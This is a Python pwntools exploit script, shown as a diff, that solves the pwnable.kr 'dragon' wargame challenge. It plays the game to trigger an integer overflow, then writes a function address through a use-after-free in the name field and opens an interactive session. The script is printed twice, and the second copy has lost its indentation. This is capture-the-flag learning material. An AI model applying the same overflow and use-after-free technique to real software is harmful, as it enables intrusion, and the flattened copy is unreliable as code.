lionaneesh · November 18, 2019 10:35
diff --git a/solve_dragon.py b/solve_dragon.py
 from pwn import *

 #r = process('./dragon')
 r = remote("pwnable.kr",  9004)
 win = p32(0x08048dbf)

 def select_priest():
    print r.recvuntil("[ 2 ] Knight")
    r.send("1\n")

 def sheild():
    print r.recvuntil("You Become Temporarily Invincible.")
    r.send("3\n")

 def clarity():
    print r.recvuntil("Invincible.")
    r.send("2\n")

 # first always baby dragon appears. Lets lose to him quickly.

 def bolt():
    print r.recvuntil("Invincible.")
    r.send("1\n")

 def victory():
    print r.recvuntil("The World Will Remember You As:")
    

 select_priest()
 bolt()
 bolt()

 # lost to baby dragon next is mama dragon

 select_priest()

 # trigger integer overflow and defeat the mama :D 
 for i in range(0, 4):
    sheild()
    sheild()
    clarity()

 victory()
 # uaf in name

 r.send(win)
 r.interactive()
	from pwn import *

	#r = process('./dragon')
	r = remote("pwnable.kr", 9004)
	win = p32(0x08048dbf)

	def select_priest():
	print r.recvuntil("[ 2 ] Knight")
	r.send("1\n")

	def sheild():
	print r.recvuntil("You Become Temporarily Invincible.")
	r.send("3\n")

	def clarity():
	print r.recvuntil("Invincible.")
	r.send("2\n")

	# first always baby dragon appears. Lets lose to him quickly.

	def bolt():
	print r.recvuntil("Invincible.")
	r.send("1\n")

	def victory():
	print r.recvuntil("The World Will Remember You As:")


	select_priest()
	bolt()
	bolt()

	# lost to baby dragon next is mama dragon

	select_priest()

	# trigger integer overflow and defeat the mama :D
	for i in range(0, 4):
	sheild()
	sheild()
	clarity()

	victory()
	# uaf in name

	r.send(win)
	r.interactive()